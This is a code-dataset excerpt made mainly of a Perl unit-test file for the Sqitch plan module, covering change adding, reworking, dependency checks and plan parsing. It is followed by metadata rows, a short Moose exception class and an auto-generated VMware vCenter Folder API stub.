ok $new_change = $plan->add(name => 'jive', requires => [qw(blow blow)]),
'Add change "jive" with dupe dependency';
is $plan->count, 7, 'Should have 7 changes';
ok $plan->contains('jive'), 'Should find "jive" in plan';
is $plan->index_of('jive'), 6, 'Should find "jive" at index 6';
is $plan->last->name, 'jive', 'jive change should be "jive"';
is_deeply [ map { $_->change } $new_change->requires ], ['blow'],
'Should have dependency "blow"';
is $new_change->as_string,
'jive [blow] ' . $new_change->timestamp->as_string . ' '
. $new_change->format_planner,
'Should have nice stringification of "jive [blow]"';
is [$plan->lines]->[-1], $new_change,
'The new change should have been appended to the lines, too';
# Make sure externals and conflicts are unique.
ok $new_change = $plan->add(
name => 'moo',
requires => [qw(ext:foo ext:foo)],
conflicts => [qw(blow blow ext:whu ext:whu)],
), 'Add change "moo" with dupe dependencies';
is $plan->count, 8, 'Should have 8 changes';
ok $plan->contains('moo'), 'Should find "moo" in plan';
is $plan->index_of('moo'), 7, 'Should find "moo" at index 7';
is $plan->last->name, 'moo', 'moo change should be "moo"';
is_deeply [ map { $_->as_string } $new_change->requires ], ['ext:foo'],
'Should require "ext:whu"';
is_deeply [ map { $_->as_string } $new_change->conflicts ], [qw(blow ext:whu)],
'Should conflict with "blow" and "ext:whu"';
is $new_change->as_string,
'moo [ext:foo !blow !ext:whu] ' . $new_change->timestamp->as_string . ' '
. $new_change->format_planner,
'Should have nice stringification of "moo [ext:foo !blow !ext:whu]"';
is [$plan->lines]->[-1], $new_change,
'The new change should have been appended to the lines, too';
# Should choke on a duplicate change.
throws_ok { $plan->add(name => 'blow') } 'App::Sqitch::X',
'Should get error trying to add duplicate change';
is $@->ident, 'plan', 'Duplicate change error ident should be "plan"';
is $@->message, __x(
qq{Change "{change}" already exists in plan {file}.\nUse "sqitch rework" to copy and rework it},
change => 'blow',
file => $plan->file,
), 'And the error message should suggest "rework"';
# Should choke on an invalid change names.
for my $name (@bad_names) {
throws_ok { $plan->add( name => $name ) } 'App::Sqitch::X',
qq{Should get error for invalid change "$name"};
is $@->ident, 'plan', qq{Invalid name "$name" error ident should be "plan"};
is $@->message, __x(
qq{"{name}" is invalid: changes must not begin with punctuation, }
. 'contain "@", ":", "#", or blanks, or end in punctuation or digits following punctuation',
name => $name,
), qq{And the "$name" error message should be correct};
}
# Try a reserved name.
for my $reserved (qw(HEAD ROOT)) {
throws_ok { $plan->add( name => $reserved ) } 'App::Sqitch::X',
qq{Should get error for reserved name "$reserved"};
is $@->ident, 'plan', qq{Reserved name "$reserved" error ident should be "plan"};
is $@->message, __x(
'"{name}" is a reserved name',
name => $reserved,
), qq{And the reserved name "$reserved" message should be correct};
}
# Try an unknown dependency.
throws_ok { $plan->add( name => 'whu', requires => ['nonesuch' ] ) } 'App::Sqitch::X',
'Should get failure for failed dependency';
is $@->ident, 'plan', 'Dependency error ident should be "plan"';
is $@->message, __x(
'Cannot add change "{change}": requires unknown change "{req}"',
change => 'whu',
req => 'nonesuch',
), 'The dependency error should be correct';
# Try invalid dependencies.
throws_ok { $plan->add( name => 'whu', requires => ['^bogus' ] ) } 'App::Sqitch::X',
'Should get failure for invalid dependency';
is $@->ident, 'plan', 'Invalid dependency error ident should be "plan"';
is $@->message, __x(
'"{dep}" is not a valid dependency specification',
dep => '^bogus',
), 'The invalid dependency error should be correct';
throws_ok { $plan->add( name => 'whu', conflicts => ['^bogus' ] ) } 'App::Sqitch::X',
'Should get failure for invalid conflict';
is $@->ident, 'plan', 'Invalid conflict error ident should be "plan"';
is $@->message, __x(
'"{dep}" is not a valid dependency specification',
dep => '^bogus',
), 'The invalid conflict error should be correct';
# Should choke on an unknown tag, too.
throws_ok { $plan->add(name => 'whu', requires => ['@nonesuch' ] ) } 'App::Sqitch::X',
'Should get failure for failed tag dependency';
is $@->ident, 'plan', 'Tag dependency error ident should be "plan"';
is $@->message, __x(
'Cannot add change "{change}": requires unknown change "{req}"',
change => 'whu',
req => '@nonesuch',
), 'The tag dependency error should be correct';
# Should choke on a change that looks like a SHA1.
throws_ok { $plan->add(name => $sha1) } 'App::Sqitch::X',
'Should get error for a SHA1 change';
is $@->ident, 'plan', 'SHA1 tag error ident should be "plan"';
is $@->message, __x(
'"{name}" is invalid because it could be confused with a SHA1 ID',
name => $sha1,,
), 'And the reserved name error should be output';
##############################################################################
# Try reworking a change.
can_ok $plan, 'rework';
ok my $rev_change = $plan->rework( name => 'you' ), 'Rework change "you"';
isa_ok $rev_change, 'App::Sqitch::Plan::Change';
is $rev_change->name, 'you', 'Reworked change should be "you"';
ok my $orig = $plan->change_at($plan->first_index_of('you')),
'Get original "you" change';
is $orig->name, 'you', 'It should also be named "you"';
is_deeply [ map { $_->format_name } $orig->rework_tags ],
[qw(@bar)], 'And it should have the one rework tag';
is $orig->deploy_file, $target->deploy_dir->file('you@bar.sql'),
'The original file should now be named you@bar.sql';
is $rev_change->as_string,
'you [you@bar] ' . $rev_change->timestamp->as_string . ' '
. $rev_change->format_planner,
'It should require the previous "you" change';
is [$plan->lines]->[-1], $rev_change,
'The new "you" should have been appended to the lines, too';
# Make sure it was appended to the plan.
ok $plan->contains('you@HEAD'), 'Should find "you@HEAD" in plan';
is $plan->index_of('you@HEAD'), 8, 'It should be at position 8';
is $plan->count, 9, 'The plan count should be 9';
# Tag and add again, to be sure we can do it multiple times.
ok $plan->tag( name => '@beta1' ), 'Tag @beta1';
ok my $rev_change2 = $plan->rework( name => 'you' ),
'Rework change "you" again';
isa_ok $rev_change2, 'App::Sqitch::Plan::Change';
is $rev_change2->name, 'you', 'New reworked change should be "you"';
ok $orig = $plan->change_at($plan->first_index_of('you')),
'Get original "you" change again';
is $orig->name, 'you', 'It should still be named "you"';
is_deeply [ map { $_->format_name } $orig->rework_tags ],
[qw(@bar)], 'And it should have the one rework tag';
ok $rev_change = $plan->get('you@beta1'), 'Get you@beta1';
is $rev_change->name, 'you', 'The second "you" should be named that';
is_deeply [ map { $_->format_name } $rev_change->rework_tags ],
[qw(@beta1)], 'And the second change should have the rework_tag "@beta1"';
is_deeply [ $rev_change2->rework_tags ],
[], 'But the new reworked change should have no rework tags';
is $rev_change2->as_string,
'you [you@beta1] ' . $rev_change2->timestamp->as_string . ' '
. $rev_change2->format_planner,
'It should require the previous "you" change';
is [$plan->lines]->[-1], $rev_change2,
'The new reworking should have been appended to the lines';
# Make sure it was appended to the plan.
ok $plan->contains('you@HEAD'), 'Should find "you@HEAD" in plan';
is $plan->index_of('you@HEAD'), 9, 'It should be at position 9';
is $plan->count, 10, 'The plan count should be 10';
# Try a nonexistent change name.
throws_ok { $plan->rework( name => 'nonexistent' ) } 'App::Sqitch::X',
'rework should die on nonexistent change';
is $@->ident, 'plan', 'Nonexistent change error ident should be "plan"';
is $@->message, __x(
qq{Change "{change}" does not exist in {file}.\nUse "sqitch add {change}" to add it to the plan},
change => 'nonexistent',
file => $plan->file,
), 'And the error should suggest "sqitch add"';
# Try reworking without an intervening tag.
throws_ok { $plan->rework( name => 'you' ) } 'App::Sqitch::X',
'rework_stpe should die on lack of intervening tag';
is $@->ident, 'plan', 'Missing tag error ident should be "plan"';
is $@->message, __x(
qq{Cannot rework "{change}" without an intervening tag.\nUse "sqitch tag" to create a tag and try again},
change => 'you',
), 'And the error should suggest "sqitch tag"';
# Make sure it checks dependencies.
throws_ok { $plan->rework( name => 'booyah', requires => ['nonesuch' ] ) }
'App::Sqitch::X',
'rework should die on failed dependency';
is $@->ident, 'plan', 'Rework dependency error ident should be "plan"';
is $@->message, __x(
'Cannot rework change "{change}": requires unknown change "{req}"',
change => 'booyah',
req => 'nonesuch',
), 'The rework dependency error should be correct';
# Try invalid dependencies.
throws_ok { $plan->rework( name => 'booyah', requires => ['^bogus' ] ) } 'App::Sqitch::X',
'Should get failure for invalid dependency';
is $@->ident, 'plan', 'Invalid dependency error ident should be "plan"';
is $@->message, __x(
'"{dep}" is not a valid dependency specification',
dep => '^bogus',
), 'The invalid dependency error should be correct';
throws_ok { $plan->rework( name => 'booyah', conflicts => ['^bogus' ] ) } 'App::Sqitch::X',
'Should get failure for invalid conflict';
is $@->ident, 'plan', 'Invalid conflict error ident should be "plan"';
is $@->message, __x(
'"{dep}" is not a valid dependency specification',
dep => '^bogus',
), 'The invalid conflict error should be correct';
##############################################################################
# Try a plan with a duplicate change in different tag sections.
$file = file qw(t plans dupe-change-diff-tag.plan);
$target = App::Sqitch::Target->new(sqitch => $sqitch, plan_file => $file);
isa_ok $plan = App::Sqitch::Plan->new(sqitch => $sqitch, target => $target),
$CLASS, 'Plan shoud work plan with dupe change across tags';
is $plan->file, $target->plan_file, 'File should be coopied from Sqitch';
is $plan->project, 'dupe_change_diff_tag', 'Project name should be set';
cmp_deeply [ $plan->lines ], [
clear,
version,
prag( '', '', 'project', '', '=', '', 'dupe_change_diff_tag'),
blank,
change { name => 'whatever' },
tag { name => 'foo', ret => 1 },
blank(),
change { name => 'hi' },
tag { name => 'bar', ret => 1 },
blank(),
change { name => 'greets' },
change { name => 'whatever', rtag => [qw(hi whatever)] },
], 'Lines with dupe change should be read from file';
$vivify = 1;
cmp_deeply [ $plan->changes ], [
clear,
change { name => 'whatever' },
tag { name => 'foo' },
change { name => 'hi' },
tag { name => 'bar' },
change { name => 'greets' },
change { name => 'whatever', rtag => [qw(hi whatever)] },
], 'Noes with dupe change should be read from file';
is sorted, 3, 'Should have sorted changes three times';
# Try to find whatever.
ok $plan->contains('whatever'), 'Should find "whatever" in plan';
throws_ok { $plan->index_of('whatever') } 'App::Sqitch::X',
'Should get an error trying to find dupe key.';
is $@->ident, 'plan', 'Dupe key error ident should be "plan"';
is $@->message, __ 'Change lookup failed',
'Dupe key error message should be correct';
is_deeply +MockOutput->get_vent, [
[__x(
'Change "{change}" is ambiguous. Please specify a tag-qualified change:',
change => 'whatever',
)],
[ ' * ', 'whatever@HEAD' ],
[ ' * ', 'whatever@foo' ],
], 'Should have output listing tag-qualified changes';
is $plan->index_of('whatever@HEAD'), 3, 'Should get 3 for whatever@HEAD';
is $plan->index_of('whatever@bar'), 0, 'Should get 0 for whatever@bar';
# Make sure seek works, too.
throws_ok { $plan->seek('whatever') } 'App::Sqitch::X',
'Should get an error seeking dupe key.';
is $@->ident, 'plan', 'Dupe key error ident should be "plan"';
is $@->message, __ 'Change lookup failed',
'Dupe key error message should be correct';
is_deeply +MockOutput->get_vent, [
[__x(
'Change "{change}" is ambiguous. Please specify a tag-qualified change:',
change => 'whatever',
)],
[ ' * ', 'whatever@HEAD' ],
[ ' * ', 'whatever@foo' ],
], 'Should have output listing tag-qualified changes';
is $plan->index_of('whatever@HEAD'), 3, 'Should find whatever@HEAD at index 3';
is $plan->index_of('whatever@bar'), 0, 'Should find whatever@HEAD at index 0';
is $plan->first_index_of('whatever'), 0,
'Should find first instance of whatever at index 0';
is $plan->first_index_of('whatever', '@bar'), 3,
'Should find first instance of whatever after @bar at index 5';
ok $plan->seek('whatever@HEAD'), 'Seek whatever@HEAD';
is $plan->position, 3, 'Position should be 3';
ok $plan->seek('whatever@bar'), 'Seek whatever@bar';
is $plan->position, 0, 'Position should be 0';
is $plan->last_tagged_change->name, 'hi', 'Last tagged change should be "hi"';
##############################################################################
# Test open_script.
make_path dir(qw(sql deploy stuff))->stringify;
END { remove_tree 'sql' };
can_ok $CLASS, 'open_script';
my $change_file = file qw(sql deploy bar.sql);
$fh = $change_file->open('>') or die "Cannot open $change_file: $!\n";
$fh->say('-- This is a comment');
$fh->close;
ok $fh = $plan->open_script($change_file), 'Open bar.sql';
is $fh->getline, "-- This is a comment\n", 'It should be the right file';
$fh->close;
file(qw(sql deploy baz.sql))->touch;
ok $fh = $plan->open_script(file qw(sql deploy baz.sql)), 'Open baz.sql';
is $fh->getline, undef, 'It should be empty';
# Make sure it dies on an invalid file.
throws_ok { $plan->open_script(file 'nonexistent' ) } 'App::Sqitch::X',
'open_script() should die on nonexistent file';
is $@->ident, 'io', 'Nonexistent file error ident should be "io"';
is $@->message, __x(
'Cannot open {file}: {error}',
file => 'nonexistent',
error => $! || 'No such file or directory',
), 'Nonexistent file error message should be correct';
##############################################################################
# Test check_changes()
$mocker->unmock('check_changes');
can_ok $CLASS, 'check_changes';
my @deps;
my $i = 0;
my $j = 0;
$mock_change->mock(requires => sub {
my $reqs = caller eq 'App::Sqitch::Plan' ? $deps[$i++] : $deps[$j++];
@{ $reqs->{requires} };
});
sub changes {
clear;
$i = $j = 0;
map {
change { name => $_ };
} @_;
}
# Start with no dependencies.
$project = 'foo';
my %ddep = ( requires => [], conflicts => [] );
@deps = ({%ddep}, {%ddep}, {%ddep});
cmp_deeply [map { $_->name } $plan->check_changes({}, changes qw(this that other))],
[qw(this that other)], 'Should get original order when no dependencies';
@deps = ({%ddep}, {%ddep}, {%ddep});
cmp_deeply [map { $_->name } $plan->check_changes('foo', changes qw(this that other))],
[qw(this that other)], 'Should get original order when no prepreqs';
# Have that require this.
@deps = ({%ddep}, {%ddep, requires => [dep 'this']}, {%ddep});
cmp_deeply [map { $_->name }$plan->check_changes('foo', changes qw(this that other))],
[qw(this that other)], 'Should get original order when that requires this';
# Have other require that.
@deps = ({%ddep}, {%ddep, requires => [dep 'this']}, {%ddep, requires => [dep 'that']});
cmp_deeply [map { $_->name } $plan->check_changes('foo', changes qw(this that other))],
[qw(this that other)], 'Should get original order when other requires that';
my $deperr = sub {
join "\n ", __n(
'Dependency error detected:',
'Dependency errors detected:',
@_
), @_
};
# Have this require other.
@deps = ({%ddep, requires => [dep 'other']}, {%ddep}, {%ddep});
throws_ok {
$plan->check_changes('foo', changes qw(this that other))
} 'App::Sqitch::X', 'Should get error for out-of-order dependency';
is $@->ident, 'parse', 'Unordered dependency error ident should be "parse"';
is $@->message, $deperr->(__nx(
'Change "{change}" planned {num} change before required change "{required}"',
'Change "{change}" planned {num} changes before required change "{required}"',
2,
change => 'this',
required => 'other',
num => 2,
) . "\n " . __xn(
'HINT: move "{change}" down {num} line in {plan}',
'HINT: move "{change}" down {num} lines in {plan}',
2,
change => 'this',
num => 2,
plan => $plan->file,
)), 'And the unordered dependency error message should be correct';
# Have this require other and that.
@deps = ({%ddep, requires => [dep 'other', dep 'that']}, {%ddep}, {%ddep});
throws_ok {
$plan->check_changes('foo', changes qw(this that other));
} 'App::Sqitch::X', 'Should get error for multiple dependency errors';
is $@->ident, 'parse', 'Multiple dependency error ident should be "parse"';
is $@->message, $deperr->(
__nx(
'Change "{change}" planned {num} change before required change "{required}"',
'Change "{change}" planned {num} changes before required change "{required}"',
2,
change => 'this',
required => 'other',
num => 2,
), __nx(
'Change "{change}" planned {num} change before required change "{required}"',
'Change "{change}" planned {num} changes before required change "{required}"',
1,
change => 'this',
required => 'that',
num => 1,
) . "\n " . __xn(
'HINT: move "{change}" down {num} line in {plan}',
'HINT: move "{change}" down {num} lines in {plan}',
2,
change => 'this',
num => 2,
plan => $plan->file,
),
), 'And the multiple dependency error message should be correct';
# Have that require a tag.
@deps = ({%ddep}, {%ddep, requires => [dep '@howdy']}, {%ddep});
cmp_deeply [$plan->check_changes('foo', {'@howdy' => 2 }, changes qw(this that other))],
[changes qw(this that other)], 'Should get original order when requiring a tag';
# Requires a step as of a tag.
@deps = ({%ddep}, {%ddep, requires => [dep 'foo@howdy']}, {%ddep});
cmp_deeply [$plan->check_changes('foo', {'foo' => 1, '@howdy' => 2 }, changes qw(this that other))],
[changes qw(this that other)],
'Should get original order when requiring a step as-of a tag';
# Should die if the step comes *after* the specified tag.
@deps = ({%ddep}, {%ddep, requires => [dep 'foo@howdy']}, {%ddep});
throws_ok { $plan->check_changes('foo', {'foo' => 3, '@howdy' => 2 }, changes qw(this that other)) }
'App::Sqitch::X', 'Should get failure for a step after a tag';
is $@->ident, 'parse', 'Step after tag error ident should be "parse"';
is $@->message, $deperr->(__x(
'Unknown change "{required}" required by change "{change}"',
required => 'foo@howdy',
change => 'that',
)), 'And we the unknown change as-of a tag message should be correct';
# Add a cycle.
@deps = ({%ddep, requires => [dep 'that']}, {%ddep, requires => [dep 'this']}, {%ddep});
throws_ok { $plan->check_changes('foo', changes qw(this that other)) } 'App::Sqitch::X',
'Should get failure for a cycle';
is $@->ident, 'parse', 'Cycle error ident should be "parse"';
is $@->message, $deperr->(
__nx(
'Change "{change}" planned {num} change before required change "{required}"',
'Change "{change}" planned {num} changes before required change "{required}"',
1,
change => 'this',
required => 'that',
num => 1,
) . "\n " . __xn(
'HINT: move "{change}" down {num} line in {plan}',
'HINT: move "{change}" down {num} lines in {plan}',
1,
change => 'this',
num => 1,
plan => $plan->file,
),
), 'The cycle error message should be correct';
# Add an extended cycle.
@deps = (
{%ddep, requires => [dep 'that']},
{%ddep, requires => [dep 'other']},
{%ddep, requires => [dep 'this']}
);
throws_ok { $plan->check_changes('foo', changes qw(this that other)) } 'App::Sqitch::X',
'Should get failure for a two-hop cycle';
is $@->ident, 'parse', 'Two-hope cycle error ident should be "parse"';
is $@->message, $deperr->(
__nx(
'Change "{change}" planned {num} change before required change "{required}"',
'Change "{change}" planned {num} changes before required change "{required}"',
1,
change => 'this',
required => 'that',
num => 1,
) . "\n " . __xn(
'HINT: move "{change}" down {num} line in {plan}',
'HINT: move "{change}" down {num} lines in {plan}',
1,
change => 'this',
num => 1,
plan => $plan->file,
), __nx(
'Change "{change}" planned {num} change before required change "{required}"',
'Change "{change}" planned {num} changes before required change "{required}"',
1,
change => 'that',
required => 'other',
num => 1,
) . "\n " . __xn(
'HINT: move "{change}" down {num} line in {plan}',
'HINT: move "{change}" down {num} lines in {plan}',
1,
change => 'that',
num => 1,
plan => $plan->file,
),
), 'The two-hop cycle error message should be correct';
# Okay, now deal with depedencies from earlier change sections.
@deps = ({%ddep, requires => [dep 'foo']}, {%ddep}, {%ddep});
cmp_deeply [$plan->check_changes('foo', { foo => 1}, changes qw(this that other))],
[changes qw(this that other)], 'Should get original order with earlier dependency';
# Mix it up.
@deps = ({%ddep, requires => [dep 'other', dep 'that']}, {%ddep, requires => [dep 'sqitch']}, {%ddep});
throws_ok {
$plan->check_changes('foo', {sqitch => 1 }, changes qw(this that other))
} 'App::Sqitch::X', 'Should get error with misordered and seen dependencies';
is $@->ident, 'parse', 'Misorderd and seen error ident should be "parse"';
is $@->message, $deperr->(
__nx(
'Change "{change}" planned {num} change before required change "{required}"',
'Change "{change}" planned {num} changes before required change "{required}"',
2,
change => 'this',
required => 'other',
num => 2,
), __nx(
'Change "{change}" planned {num} change before required change "{required}"',
'Change "{change}" planned {num} changes before required change "{required}"',
1,
change => 'this',
required => 'that',
num => 1,
) . "\n " . __xn(
'HINT: move "{change}" down {num} line in {plan}',
'HINT: move "{change}" down {num} lines in {plan}',
2,
change => 'this',
num => 2,
plan => $plan->file,
),
), 'And the misordered and seen error message should be correct';
# Make sure it fails on unknown previous dependencies.
@deps = ({%ddep, requires => [dep 'foo']}, {%ddep}, {%ddep});
throws_ok { $plan->check_changes('foo', changes qw(this that other)) } 'App::Sqitch::X',
'Should die on unknown dependency';
is $@->ident, 'parse', 'Unknown dependency error ident should be "parse"';
is $@->message, $deperr->(__x(
'Unknown change "{required}" required by change "{change}"',
required => 'foo',
change => 'this',
)), 'And the error should point to the offending change';
# Okay, now deal with depedencies from earlier change sections.
@deps = ({%ddep, requires => [dep '@foo']}, {%ddep}, {%ddep});
throws_ok { $plan->check_changes('foo', changes qw(this that other)) } 'App::Sqitch::X',
'Should die on unknown tag dependency';
is $@->ident, 'parse', 'Unknown tag dependency error ident should be "parse"';
is $@->message, $deperr->(__x(
'Unknown change "{required}" required by change "{change}"',
required => '@foo',
change => 'this',
)), 'And the error should point to the offending change';
# Allow dependencies from different projects.
@deps = ({%ddep}, {%ddep, requires => [dep 'bar:bob']}, {%ddep});
cmp_deeply [$plan->check_changes('foo', changes qw(this that other))],
[changes qw(this that other)], 'Should get original order with external dependency';
$project = undef;
# Make sure that a change does not require itself
@deps = ({%ddep, requires => [dep 'this']}, {%ddep}, {%ddep});
throws_ok { $plan->check_changes('foo', changes qw(this that other)) } 'App::Sqitch::X',
'Should die on self dependency';
is $@->ident, 'parse', 'Self dependency error ident should be "parse"';
is $@->message, $deperr->(__x(
'Change "{change}" cannot require itself',
change => 'this',
)), 'And the self dependency error should be correct';
# Make sure sort ordering respects the original ordering.
@deps = (
{%ddep},
{%ddep},
{%ddep, requires => [dep 'that']},
{%ddep, requires => [dep 'that', dep 'this']},
);
cmp_deeply [$plan->check_changes('foo', changes qw(this that other thing))],
[changes qw(this that other thing)],
'Should get original order with cascading dependencies';
$project = undef;
@deps = (
{%ddep},
{%ddep},
{%ddep, requires => [dep 'that']},
{%ddep, requires => [dep 'that', dep 'this', dep 'other']},
{%ddep, requires => [dep 'that', dep 'this']},
);
cmp_deeply [$plan->check_changes('foo', changes qw(this that other thing yowza))],
[changes qw(this that other thing yowza)],
'Should get original order with multiple cascading dependencies';
$project = undef;
##############################################################################
# Test dependency testing.
can_ok $plan, '_check_dependencies';
$mock_change->unmock('requires');
for my $req (qw(hi greets whatever @foo whatever@foo ext:larry ext:greets)) {
$change = App::Sqitch::Plan::Change->new(
plan => $plan,
name => 'lazy',
requires => [dep $req],
);
my $req_proj = $req =~ /:/ ? do {
(my $p = $req) =~ s/:.+//;
$p;
} : $plan->project;
my ($dep) = $change->requires;
is $dep->project, $req_proj,
qq{Depend "$req" should be in project "$req_proj"};
ok $plan->_check_dependencies($change, 'add'),
qq{Dependency on "$req" should succeed};
}
for my $req (qw(wanker @blah greets@foo)) {
$change = App::Sqitch::Plan::Change->new(
plan => $plan,
name => 'lazy',
requires => [dep $req],
);
throws_ok { $plan->_check_dependencies($change, 'bark') } 'App::Sqitch::X',
qq{Should get error trying to depend on "$req"};
is $@->ident, 'plan', qq{Dependency "req" error ident should be "plan"};
is $@->message, __x(
'Cannot rework change "{change}": requires unknown change "{req}"',
change => 'lazy',
req => $req,
), qq{And should get unknown dependency message for "$req"};
}
##############################################################################
# Test pragma accessors.
is $plan->uri, undef, 'Should have undef URI when no pragma';
$file = file qw(t plans pragmas.plan);
$target = App::Sqitch::Target->new(sqitch => $sqitch, plan_file => $file);
isa_ok $plan = App::Sqitch::Plan->new(sqitch => $sqitch, target => $target),
$CLASS, 'Plan with sqitch with plan file with dependencies';
is $plan->file, $target->plan_file, 'File should be coopied from Sqitch';
is $plan->syntax_version, App::Sqitch::Plan::SYNTAX_VERSION,
'syntax_version should be set';
is $plan->project, 'pragmata', 'Project should be set';
is $plan->uri, URI->new('https://github.com/sqitchers/sqitch/'),
'Should have URI from pragma';
isa_ok $plan->uri, 'URI', 'It';
# Make sure we get an error if there is no project pragma.
$fh = IO::File->new(\"%strict\n\nfoo $tsnp", '<:utf8_strict');
throws_ok { $plan->_parse('noproject', $fh) } 'App::Sqitch::X',
'Should die on plan with no project pragma';
is $@->ident, 'parse', 'Missing prorject error ident should be "parse"';
is $@->message, __x('Missing %project pragma in {file}', file => 'noproject'),
'The missing project error message should be correct';
# Make sure we get an error for an invalid project name.
for my $bad (@bad_names) {
my $fh = IO::File->new(\"%project=$bad\n\nfoo $tsnp", '<:utf8_strict');
throws_ok { $plan->_parse(badproj => $fh) } 'App::Sqitch::X',
qq{Should die on invalid project name "$bad"};
is $@->ident, 'parse', qq{Ident for bad proj "$bad" should be "parse"};
my $error = __x(
'invalid project name "{project}": project names must not '
. 'begin with punctuation, contain "@", ":", "#", or blanks, or end in '
. 'punctuation or digits following punctuation',
project => $bad);
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => 'badproj',
lineno => 1,
error => $error
), qq{Error message for bad project "$bad" should be correct};
}
done_testing;
| 39.4 | 109 | 0.581973 |
ed9fd378076d7e1229a349da665d526d4cda3220 | 323 | pm | Perl | lib/Moose/Exception/OverloadRequiresNamesForCoderef.pm | mjemmeson/Moose | 500a1f3331d4a7187775f4b82cdc4f1af2e232d6 | [
"Artistic-1.0"
] | null | null | null | lib/Moose/Exception/OverloadRequiresNamesForCoderef.pm | mjemmeson/Moose | 500a1f3331d4a7187775f4b82cdc4f1af2e232d6 | [
"Artistic-1.0"
] | null | null | null | lib/Moose/Exception/OverloadRequiresNamesForCoderef.pm | mjemmeson/Moose | 500a1f3331d4a7187775f4b82cdc4f1af2e232d6 | [
"Artistic-1.0"
] | null | null | null | package Moose::Exception::OverloadRequiresNamesForCoderef;
our $VERSION = '2.1803';
use Moose;
extends 'Moose::Exception';
sub _build_message {
my $self = shift;
'If you provide a coderef parameter to the Moose::Meta::Overload constructor you must also provide coderef_package and coderef_name parameters';
}
1;
| 24.846154 | 148 | 0.758514 |
ed6b3c5e408d4126461c5a5deaed4fa991b11e06 | 4,315 | pm | Perl | lib/sdk/Com/Vmware/Vcenter/FolderStub.pm | bince-criticalcase/vsphere-automation-sdk-perl | da3330bf66dc6c853e9a23062146d54afc299955 | [
"MIT"
] | 26 | 2017-04-24T19:20:08.000Z | 2021-12-06T23:15:09.000Z | lib/sdk/Com/Vmware/Vcenter/FolderStub.pm | bince-criticalcase/vsphere-automation-sdk-perl | da3330bf66dc6c853e9a23062146d54afc299955 | [
"MIT"
] | 7 | 2017-05-25T04:49:56.000Z | 2020-10-12T09:13:16.000Z | lib/sdk/Com/Vmware/Vcenter/FolderStub.pm | DamonLiang2021/vsphere-automation-sdk-perl | da3330bf66dc6c853e9a23062146d54afc299955 | [
"MIT"
] | 11 | 2017-05-05T11:52:12.000Z | 2021-12-06T23:14:59.000Z | ########################################################################
# Copyright (C) 2013 - 2014 VMware, Inc.
########################################################################
## @file FolderStub.pm
# Auto generated vAPI skeleton file.
# DO NOT MODIFY!
#
#
#use Com::Vmware::Vapi::Std::Errors;
package Com::Vmware::Vcenter::FolderStub;
## @class Com::Vmware::Vcenter::Folder
#
#The {@term Folder} {@term service} provides {@term operations} for
#manipulating a vCenter Server folder.
#
#
# Core Perl modules
#
use strict;
use warnings;
use Carp;
#
# Vapi Perl modules
#
use Com::Vmware::Vapi::Bindings::Type::BlobType;
use Com::Vmware::Vapi::Bindings::Type::BooleanType;
use Com::Vmware::Vapi::Bindings::Type::DateTimeType;
use Com::Vmware::Vapi::Bindings::Type::DoubleType;
use Com::Vmware::Vapi::Bindings::Type::EnumType;
use Com::Vmware::Vapi::Bindings::Type::ErrorType;
use Com::Vmware::Vapi::Bindings::Type::ListType;
use Com::Vmware::Vapi::Bindings::Type::LongType;
use Com::Vmware::Vapi::Bindings::Type::MapType;
use Com::Vmware::Vapi::Bindings::Type::OpaqueType;
use Com::Vmware::Vapi::Bindings::Type::OptionalType;
use Com::Vmware::Vapi::Bindings::Type::ReferenceType;
use Com::Vmware::Vapi::Bindings::Type::SecretType;
use Com::Vmware::Vapi::Bindings::Type::SetType;
use Com::Vmware::Vapi::Bindings::Type::StringType;
use Com::Vmware::Vapi::Bindings::Type::StructType;
use Com::Vmware::Vapi::Bindings::Type::DynamicStructType;
use Com::Vmware::Vapi::Bindings::Type::URIType;
use Com::Vmware::Vapi::Bindings::Type::VoidType;
use Com::Vmware::Vapi::Data::UnionValidator;
#
# Base class
#
use base qw(Com::Vmware::Vapi::Bindings::ApiInterfaceStub);
## @method new
# Constructor to initialize the object
#
# @param ApiProvider - ApiProvider for vAPI stubs
#
# @return
# Blessed object
#
sub new
{
my ($class, %args) = @_;
my $api_provider = $args {api_provider};
$class = ref($class) || $class;
#
# properties for list operation
#
my $list_input_type = new Com::Vmware::Vapi::Bindings::Type::StructType(
'name' => 'operation-input',
'fields' => {
'filter' => new Com::Vmware::Vapi::Bindings::Type::OptionalType('element_type' => new Com::Vmware::Vapi::Bindings::Type::ReferenceType('module_ctx' => 'Com::Vmware::Vcenter', 'type_name' => 'Folder::FilterSpec')),
}
);
my $list_error_dict = {
'com.vmware.vapi.std.errors.invalid_argument' => new Com::Vmware::Vapi::Bindings::Type::ReferenceType('module_ctx' => 'Com::Vmware::Vapi::Std::Errors', 'type_name' => 'InvalidArgument'),
'com.vmware.vapi.std.errors.unable_to_allocate_resource' => new Com::Vmware::Vapi::Bindings::Type::ReferenceType('module_ctx' => 'Com::Vmware::Vapi::Std::Errors', 'type_name' => 'UnableToAllocateResource'),
'com.vmware.vapi.std.errors.service_unavailable' => new Com::Vmware::Vapi::Bindings::Type::ReferenceType('module_ctx' => 'Com::Vmware::Vapi::Std::Errors', 'type_name' => 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.unauthenticated' => new Com::Vmware::Vapi::Bindings::Type::ReferenceType('module_ctx' => 'Com::Vmware::Vapi::Std::Errors', 'type_name' => 'Unauthenticated'),
'com.vmware.vapi.std.errors.unauthorized' => new Com::Vmware::Vapi::Bindings::Type::ReferenceType('module_ctx' => 'Com::Vmware::Vapi::Std::Errors', 'type_name' => 'Unauthorized'),
};
my $list_input_validator_list = [
];
my $list_output_validator_list = [];
#
# All the methods (operations) info in a hash
#
my $operations = {
'list' => {
'input_type'=> $list_input_type,
'output_type'=> new Com::Vmware::Vapi::Bindings::Type::ListType(new Com::Vmware::Vapi::Bindings::Type::ReferenceType('module_ctx' => 'Com::Vmware::Vcenter', 'type_name' => 'Folder::Summary')),
'errors'=> $list_error_dict,
'input_validator_list'=> $list_input_validator_list,
'output_validator_list'=> $list_output_validator_list,
},
};
my $self = $class->SUPER::new ('api_provider' => $api_provider,
'iface_name' => 'com.vmware.vcenter.folder',
'operations' => $operations
);
bless $self, $class;
return $self;
}
1;
| 37.850877 | 232 | 0.635226 |
ed82f8fb10f63c07c8fd4c7f668c95597310ac7a | 38,744 | pl | Perl | mr.4r.pl | batereck/lacak-orang | 2534950c41ad90ee23ca63c4aa82943b6907ed2a | [
"MIT"
] | null | null | null | mr.4r.pl | batereck/lacak-orang | 2534950c41ad90ee23ca63c4aa82943b6907ed2a | [
"MIT"
